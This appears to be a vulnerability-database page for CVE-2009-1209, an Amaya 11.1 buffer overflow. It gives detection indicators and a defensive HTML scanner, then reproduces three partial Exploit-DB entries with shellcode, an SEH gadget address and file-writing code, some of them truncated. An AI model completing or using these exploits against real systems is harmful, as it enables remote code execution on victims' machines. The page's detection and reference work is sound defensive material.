CVE-2009-1209
Published 2009-04-01
CVE-2009-1209: Stack-based buffer overflow in W3C Amaya Web Browser 11.1 allows remote attackers to execute arbitrary code via a script tag with a long defer attribute.
Priority: P3 · 57 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit available (see the Exploit-DB entries below)
EPSS: 12.37% (95.7th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| w3 | amaya | — | — |
Detection & IOCs (extracted from sources)
- The exploit triggers via an HTML <script> tag with an excessively long 'defer' attribute; detect HTTP responses or files containing a <script> tag whose defer attribute value is abnormally large (thousands of characters).
- The exploit payload uses a SEH (Structured Exception Handler) overwrite chain; the pop/pop/ret gadget address 0x02101917 is located inside an Amaya module, so the presence of this address in a crash context or memory scan of Amaya is indicative of exploitation.
- The exploit requires roughly 6887 bytes of padding before the SEH overwrite; network or file-based detection should flag HTML files with a <script defer=...> attribute value exceeding ~6000 characters.
- Malicious HTML exploit files targeting this CVE have been observed with the filenames 'exploit.html', 'remote_love.html' and 'Devil_inside.html'; monitor for creation or download of these filenames.
- The exploit targets Windows XP SP2 specifically; Amaya 11.1 and 11.2 are the confirmed vulnerable versions.
- The SEH pop/pop/ret gadget address (0x02101917) is specific to the Amaya module as shipped; it may differ across builds, patch levels or OS configurations and should be validated before use in signatures.
- Two distinct shellcode payloads are present across the exploit variants (alphanumeric SEH exploit for 11.2 vs. raw x86 shellcode for 11.1); detection rules should account for both encodings.
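As an added example (not code from this record or from any of the indexed exploits), a small standard-library scanner that implements the first and third detection points above: it parses HTML and reports <script> tags whose defer attribute value exceeds a length threshold. The 6000-character threshold and the two sample documents are constructed here for illustration.

```python
from html.parser import HTMLParser

# Constructed threshold: the indexed exploits pad the defer attribute with
# roughly 6887 bytes before the SEH overwrite, while a legitimate defer is a
# boolean attribute (bare, "" or "defer"). Anything in the thousands is anomalous.
DEFER_THRESHOLD = 6000


class DeferScanner(HTMLParser):
    """Collect <script> start tags whose defer attribute value is abnormally long."""

    def __init__(self, threshold=DEFER_THRESHOLD):
        super().__init__()
        self.threshold = threshold
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":  # HTMLParser already lowercases tag/attribute names
            return
        for name, value in attrs:
            # A bare 'defer' arrives as value None; that is the normal, benign form.
            if name == "defer" and value is not None and len(value) > self.threshold:
                line, col = self.getpos()
                self.findings.append(
                    {"line": line, "col": col, "defer_length": len(value)}
                )


def scan_html(html, threshold=DEFER_THRESHOLD):
    """Return a list of findings for oversized defer attributes in one document."""
    scanner = DeferScanner(threshold)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample documents (not taken from the exploits indexed on this page).
BENIGN = '<html><head><script defer src="app.js"></script></head></html>'
SUSPICIOUS = '<html><body><script defer="' + "A" * 7000 + '"></script></body></html>'

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_html(doc))
```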
No detection rules found.
Exploit-DB · 2009-08-03
Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)
---
```python
#!/usr/bin/python
# Alphanumeric shellcode as indexed; the banner comment preceding it was lost in extraction.
shellcode = (
    "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
    "TiKyosYyyN8YzN9IT4utL4SkoqRSwcUOJKKJ7rMSzKKLIrkDysv"
    "cONtBUOjKrQCwEscPlFEWcWJJVuk9pPkCPqqMeokZTQPKLTkoQa"
    "ws8qYJFZmKLsbOVZBVvxEzfPdOwnQ921l6Q4OOyN362JfnrQSmU"
    "kkZr1e4OdhgnQLISp9gkKZIntL7qa5Sl4QroV5vUKDhxKyR3KSP"
    "MjTrMJvKnbVnlTLkKFOyPozWf7NiqgXcTQVkMDbKqZtBuOXkT1p"
    "jusNTJkL4cOMmPszZmLtkmQsbRWUKppS6SpMSQrilNum5nMYmL8"
    "k8ok2NSLjKkJ32WzA")
# The payload assembly is not present in the indexed copy of this exploit.
payload = ""
try:
    out_file = open("exploit.html", "w")
    out_file.write(payload)
    out_file.close()
    print("\nExploit file created!\n")
except IOError:
    print("Error")
# milw0rm.com [2009-08-03]
```
Exploit-DB · 2009-03-30
Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)
---
```php
";
$hnd = fopen("remote_love.html", "w");
if ($hnd) {
    fputs($hnd, $hello);
    fclose($hnd);
    echo "DONE !!\n";
} else {
    echo "Kupa !!\n";
}
?>
```
# milw0rm.com [2009-03-30]
Exploit-DB · 2009-03-30
Amaya 11.1 - W3C Editor/Browser 'defer' Remote Stack Overflow
---
```python
# exploit.py
#
# Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Original Advisory:
# http://www.milw0rm.com/exploits/8314
#
# Fully Based on Rob Carter's Exploit
# http://www.milw0rm.com/exploits/7988
#
# Note: you need to upload Devil_inside.html to a remote host
# Works with Windows XP SP2
#
# metasploit - run calc.exe
shellcode = (
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
    "\x58\x30\x41\x30\x50\x41\x6b\x41\x41\x73\x32\x41\x42\x41\x32\x42"
    "\x42\x30\x42\x42\x58\x42\x50\x38\x41\x42\x75\x4d\x39\x59\x6c\x4d"
    "\x38\x42\x64\x33\x30\x37\x70\x47\x70\x4e\x6b\x52\x65\x65\x6c\x6e"
    "\x6b\x41\x6c\x74\
```
No writeups or analysis indexed.
References
- http://secunia.com/advisories/34531
- http://www.securityfocus.com/bid/34295
- http://www.vupen.com/english/advisories/2009/0889
- https://exchange.xforce.ibmcloud.com/vulnerabilities/47399
- https://www.exploit-db.com/exploits/8314
- https://www.exploit-db.com/exploits/8321